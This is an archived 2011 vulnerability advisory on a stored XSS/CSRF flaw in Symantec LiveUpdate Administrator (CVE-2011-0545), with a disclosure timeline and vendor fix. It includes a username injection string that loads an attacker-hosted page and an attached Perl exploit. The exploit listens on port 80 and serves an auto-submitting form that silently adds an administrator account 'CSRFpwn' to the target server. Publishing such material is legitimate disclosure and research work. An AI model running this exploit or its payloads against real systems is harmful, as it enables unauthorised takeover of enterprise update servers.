[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

NSOADV-2011-001: Symantec LiveUpdate Administrator CSRF vulnerability



______________________________________________________________________

NSOADV-2011-001: Symantec LiveUpdate Administrator CSRF vulnerability
______________________________________________________________________
______________________________________________________________________

                               111101111
                        11111 00110 00110001111
                   111111 01 01 1 11111011111111
                11111  0 11 01 0 11 1 1  111011001
             11111111101 1 11 0110111  1    1111101111
           1001  0 1 10 11 0 10 11 1111111  1 111 111001
         111111111 0 10 1111 0 11 11 111111111 1 1101 10
        00111 0 0 11 00 0 1110 1 1011111111111 1111111 11  100
       10111111 0 01 0  1 1 111110 11 1111111111111  11110000011
       0111111110 0110 1110 1 0 11101111111111111011 11100  00
       01111 0 10 1110 1 011111 1 111111111111111111111101 01
       01110 0 10 111110 110 0 11101111111111111111101111101
      111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
      111110110 10 0111110 1 0 0 1111111111111111111111111 110
    111 11111 1  1 111 1   10011 101111111111011111111 0   1100
   111 10  110 101011110010   11111111111111111111111 11 0011100
   11 10     001100     0001      111111111111111111 10 11 11110
  11110       00100      00001     10 1  1111  101010001 11111111
  11101        0  1011     10000    00100 11100        00001101 0
  0110         111011011             0110   10001        101 11110
  1011                 1             10 101   000001        01   00
   1010 1                              11001      1 1        101  10
      110101011                          0 101                 11110
            110000011
                      111
______________________________________________________________________
______________________________________________________________________

  Title:                  Symantec LiveUpdate Administrator CSRF
                          vulnerability
  Severity:               Medium
  Advisory ID:            NSOADV-2011-001
  Found Date:             14.07.2010
  Date Reported:          17.01.2011
  Release Date:           22.03.2011
  Author:                 Nikolas Sotiriu
  Mail:                   nso-research at sotiriu.de
  Website:                http://sotiriu.de/
  Twitter:                http://twitter.com/nsoresearch
  Advisory-URL:           http://sotiriu.de/adv/NSOADV-2010-001.txt
  Vendor:                 Symantec (http://www.symantec.com/)
  Affected Products:      Symantec LiveUpdate Administrator <= 2.2.2.9
  Remote Exploitable:     Yes
  Local Exploitable:      No
  CVE-ID:                 CVE-2011-0545
  Patch Status:           Vendor released an patch
  Discovered by:          Nikolas Sotiriu
  Disclosure Policy:      http://sotiriu.de/policy.html
  Thanks to:              Thierry Zoller: For the permission to use his
                                          Policy



Background:
===========

The Symantec LiveUpdate Administrator is an enterprise Web application
that allows you to manage Symantec updates on multiple internal Central
LiveUpdate servers, called Distribution Centers. Using the Symantec
LiveUpdate Administrator, you download updates to the Manage Updates
folder, and then publish the updates to production distribution servers
for LiveUpdate clients to download, or to testing distribution centers,
so that the updates can be tested before they are published to production.

You can download and publish updates on schedule, allowing you to create
a low maintenance, reliable system that can be set up once, and then run
automatically. Updates can also be manually downloaded and published as
needed.

(Product description from LUA Admin Guide)



Description:
============

The webfrontend do not properly sanitize some variables before being
returned to the user.

If an attacker supplies a username, containing script code, at the
login-page of the service, an entry in the Event Log is done, containing
the "user name".

If the admin user is viewing the logfile, the script code will be
executed.

This can be exploited to execute arbitrary HTML and script code in a
admin's browser session in context of the Web Administrator frontend.

If an attacker passes a user name like

<iframe src=http://attacker/evil.html>

in the username field he can execute CSRF attacks against the
Webfrontend to change the settings.

The Proof of Concept code addes an admin account or executes an alert box.




Proof of Concept :
==================

* attached *



Solution:
=========

Update to Version 2.3

Symantec Security Advisory: http://tinyurl.com/4oox6hy



Disclosure Timeline (YYYY/MM/DD):
=================================

2010.07.14: Vulnerability found
2011.01.17: Sent PoC, Advisory, Disclosure policy and planned disclosure
            date (2011.02.04) to Vendor
2011.01.17: Vendor response
2011.01.20: Symantec product team verifies the finding
2011.02.03: Ask for a status update
2011.02.03: Symantec Security Response Team informs me that the update
            is planned for early to mid-March.
2011.02.03: Changed release date to 2011.03.10.
2011.03.03: Symantec Security Response Team informs me that the update
            is planned for 2011.03.17.
2011.03.17: Symantec Security Response Team informs me that the update
            QA needs a bit more time.
2011.03.21: Update and Security Advisory release.
2011.03.22: Release of this Advisory






#!/usr/bin/perl

##
#  Title:     Symantec Live Update Administrator CSRF Exploit
#  Name:      luaCSRF.pl
#  Author:    Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
#  Use it only for education or ethical pentesting! The author accepts
#  no liability for damage caused by this tool.
#
##


use Socket;
use IO::Handle;
use Getopt::Std;

my %args;
getopt('g:h:', \%args);

my $payload     = $args{g} || usage();
my $victim      = $args{h} || usage();

banner();

if ($payload eq "1") {
        print "[+] Using the Alert Box payload\n";
        # Alert Box
        $html = <<ENDHTML;
<html>
<SCRIPT LANGUAGE="JavaScript">alert('!!!XSS/CSRF vulnerability!!!')</SCRIPT>
</html>

ENDHTML

} elsif ($payload eq "2") {
        print "[+] Using the add admin user payload\n";
        # Adds the user CSRFpwn with password 12345678
        $html = <<ENDHTML;
<html>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://$victim:7070/lua/adduser.do"; method="post">
                <input type="hidden" name="dispatch" value="save" />
                <input type="hidden" name="username" value="CSRFpwn" />
                <input type="hidden" name="password" value="12345678"/>
                <input type="hidden" name="verifyPassword" value="12345678"/>
                <input type="hidden" name="lastname" value="junk" />
                <input type="hidden" name="firstname" value="junk" />
                <input type="hidden" name="email" value="junk&#64;junk.com" />
                <input type="hidden" name="userRole" value="1" />
            </form>
        </body>
</html>

ENDHTML

}

my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "[-] socket() failed: $!";
setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "[-] Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in(80,INADDR_ANY);
bind(SOCK,$my_addr) or die "[-] bind() failed: $!";
listen(SOCK,SOMAXCONN) or die "[-] listen() failed: $!";
warn "[+] waiting for incoming connections on port 80...\n";
warn "[+] Enter the following String in the LUA username login field\n";
warn "[+] (e.q. HTTP/SSH) and wair for the admin to view the Logs\n";
warn "[+]\n";
warn "[+] <frame src=http://<LOCAL_ADDRESS>/.html>\n";

$repeat = 1;
$victim = inet_aton("0.0.0.0");
while($repeat) {
    my $remote_addr = accept(SESSION,SOCK);
    my ($port,$hisaddr) = sockaddr_in($remote_addr);
    warn "[+] Connection from [",inet_ntoa($hisaddr),",$port]\n";
    $victim = $hisaddr;
    SESSION->autoflush(1);
    if(<SESSION>) {
       print SESSION $http_header . $html;
    }
    warn "[+] Connection from [",inet_ntoa($hisaddr),",$port] finished\n";
    close SESSION;
}

sub usage {
print $payload;
    print "\n";
    print " luaCSRF.pl - Symantec LUA CSRF Exploit\n";
    print "===============================================================\n\n";
    print "  Usage:\n";
    print "           $0 -g <payload> -h <lua-ip>\n";
    print "  Optional:\n";
    print "           -p       <local port to listen on>\n";
    print "           -g (1|2) <payload to use>\n";
    print "                    1 <Execute an alert box\n";
    print "                    2 <Add the Admin User \"CSRFpwn\">\n";
    print "  Notes:\n";
    print "           -nothing here\n";
    print "\n";
    print "  Author:\n";
    print "           Nikolas Sotiriu (lofi)\n";
    print "           url: www.sotiriu.de\n";
    print "           mail: lofi[at]sotiriu.de\n";
    print "\n";


    exit(1);
}

sub banner {
        print STDERR << "EOF";
--------------------------------------------------------------------------------
               luaCSRF.pl - Symantec LUA CSRF Exploit
--------------------------------------------------------------------------------

                                   111 1111111
                            11100 101 00110111001111
                        11101 11 10 111 101 1001111111
                    1101  11 00 10 11  11 111 1111111101
                 10111 1 10 11 10  0 10  1 1 1  1111111011
              1111  1 1 10  0  01 01 01 1 1 111     1111011101
            1000   0 11 10 10  0 10 11 111 11111 11 1111 111100
          1111111111 01 10 10 11 01 0  11 11111111111 1 1111  11
         10111110 0  01 00 11 1110 11 10 11111111111 11 11111  11   111
        101111111 0 10  01 11 1 11 0 10 11 1111111111111111 1111110000111
        011111 0110 10 10  0 11 1 11 01 01 111111111111111 1 11110011001
       1011111 0110 10 11 1110 11 1 10 11111111111111111111  1 100  001
       1011111 0 10 10 01 1  0 1 11 1 111111111111111111111111 001101
        011111 0  0  0 11 0 1111 0 11 01111111111111111111111111  01
       1111111 01 01 111  1 1111 1 11 1111111111111111111111 1101 1111
      111 1111 10  0 111110 0111 0 1  0111111111111111111111 11111 1111
     111 11111  1  11 1 1 1    111 11 11111111111111111111111110    1001
    111 1011111   1 11111111110111111111111111111111111111111 01 10111001
   11 1100    10110110    10001        11101111111111111111  10 111 11100
  111  00      1011101      00101       0  11111111111111111001 11  111101
  11  00        00 101      1000011     1011   1111   1111111000 1111111 0
  11 00          0   1011      100001    101000 1 1001         00001111  01
  01101          11111 1011               01100    0101          110  11 10
  10111                   1                0  01    0000011         10    10
   10011                                    11100       1111         101   11
      1110 01                                 101011                   1001100
         1111000011                            1  111
                11000001111
                           1

EOF
}